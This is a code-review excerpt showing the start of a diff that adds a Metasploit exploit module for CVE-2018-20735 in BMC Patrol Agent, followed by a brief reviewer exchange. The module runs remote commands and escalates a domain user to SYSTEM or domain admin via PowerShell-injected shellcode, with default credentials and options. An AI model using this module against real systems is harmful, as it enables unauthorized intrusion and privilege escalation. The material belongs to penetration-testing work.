modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb

```diff
@@ -0,0 +1,1170 @@
+  @des_keysch_1 = $nil
+
+  DES_ENCRYPT = 0
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'BMC Patrol Agent Privilege Escalation Cmd Execution',
+      'Description'    => %q{
+        This module leverages the remote command execution feature provided by
+        the BMC Patrol Agent software. It can also be used to escalate privileges
+        on Windows hosts as the software runs as SYSTEM but only verfies that the password
+        of the provided user is correct. This also means if the software is running on a
+        domain controller, it can be used to escalate from a normal domain user to domain
+        admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses
+        powershell to execute the payload.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-20735'],
+          ['URL', 'https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/']
+        ],
+      'Platform'       => ['win','linux'],
+      'Targets'         =>
+        [
+          [
+            'Windows Powershell Injected Shellcode', {
+              'Platform' => 'win'
+            }
+          ],
+          [
+            'Generic Command', {
+              'Arch' => ARCH_CMD,
+              'Platform' => %w[linux unix win]
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'DisablePayloadHandler' => true,
+      },
+      'DisclosureDate' => 'Jan 17 2019'))
+
+      register_options([
+        Opt::RPORT(3181),
+        OptString.new('USER',   [ true,  'local or domain user to authenticate with patrol', 'patrol' ]),
+        OptString.new('PASSWORD',   [ true,  'password to authenticate with patrol', 'password' ]),
+        OptString.new('CMD',   [ false,  'command to run on the target. If this option is specified the payload will be ignored.' ])
+      ])
+
+    end
+
+  def cleanup
+    disconnect
+    @inflater.close
+    @deflater.close
+    super
+  end
+
+  def get_target_os( srv_info_msg )
+    lines = srv_info_msg.split("\n")
+    if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}"
+      print_error("Invalid server info msg.")
+      return
+    end
+
+    os = $nil
+    ver = $nil
+    lines[2..-2].each do |i|
+      val = i.split("=")
+      if val.length == 2
+        if val[0].strip! == "T"
+          os = val[1]
+        elsif val[0].strip! == "VER"
+          ver = val[1]
+        end
+      end
+    end
+    return [os,ver]
+  end
+
+  def get_cmd_output( cmd_output_msg )
+
+    lines = cmd_output_msg.split("\n")
+    if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
+      print_error("Invalid command output msg.")
+      return
+    end
```

Comment:
You could do something similar to the suggest for `get_target_os` above.

Reply:
Done